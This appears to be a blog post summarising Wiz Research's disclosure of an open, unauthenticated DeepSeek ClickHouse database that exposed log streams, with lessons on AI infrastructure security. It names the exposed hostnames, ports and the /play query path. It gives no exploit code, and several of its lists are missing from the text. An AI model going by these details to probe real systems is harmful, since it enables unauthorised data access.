In a recent discovery, Wiz Research uncovered a significant security lapse in DeepSeek, a rising Chinese AI startup. A publicly accessible ClickHouse database belonging to DeepSeek was found to be exposing sensitive data. This incident highlights the critical need for robust security measures in the rapidly evolving field of Artificial Intelligence. This blog post will delve into the details of the database exposure, its potential impact, and broader implications for the AI industry.
The Wiz Research team, while assessing DeepSeek’s external security, identified a publicly accessible ClickHouse database. This database, hosted at oauth2callback.deepseek.com:9000
and dev.deepseek.com:9000
, was completely open and unauthenticated, allowing full control over database operations and access to internal data.
The exposed database contained over a million lines of log streams, including:
This sensitive information posed a significant risk to DeepSeek and its users. The lack of authentication could have allowed attackers to:
Wiz Research's reconnaissance efforts began with mapping DeepSeek's external attack surface, identifying around 30 internet-facing subdomains. While most appeared harmless, the discovery of open ports (8123 & 9000) led to the exposed ClickHouse database.
By leveraging ClickHouse’s HTTP interface and accessing the /play
path, researchers were able to execute arbitrary SQL queries via the browser. This exposed a table named log_stream
, containing extensive logs with sensitive data.
The log_stream
table contained revealing columns such as:
This incident underscores several critical points about AI security:
The exposure highlights the importance of securing the infrastructure and tools supporting AI applications. While much focus is on futuristic AI threats, fundamental security practices cannot be overlooked.
The rapid integration of AI into businesses necessitates a stronger focus on security practices. It is vital for organizations to recognize the risks associated with handling sensitive data and enforce security measures comparable to those required for cloud and infrastructure providers.
As organizations adopt AI tools, they entrust these companies with sensitive data. This makes it imperative for security teams to collaborate with AI engineers, ensuring visibility into the architecture, tooling, and models being used.
The DeepSeek database exposure serves as a crucial reminder of the importance of security in the AI landscape. As AI becomes more deeply integrated into businesses globally, the industry must prioritize security practices. Addressing fundamental security risks and fostering collaboration between security teams and AI engineers will be essential to safeguard data and prevent future exposures.
To further explore the evolving AI landscape, consider reviewing The State of AI in the Cloud 2025 report to understand the broader context of AI adoption and its associated security challenges. To delve deeper into AI unique security risks, see this Wiz Academy resource.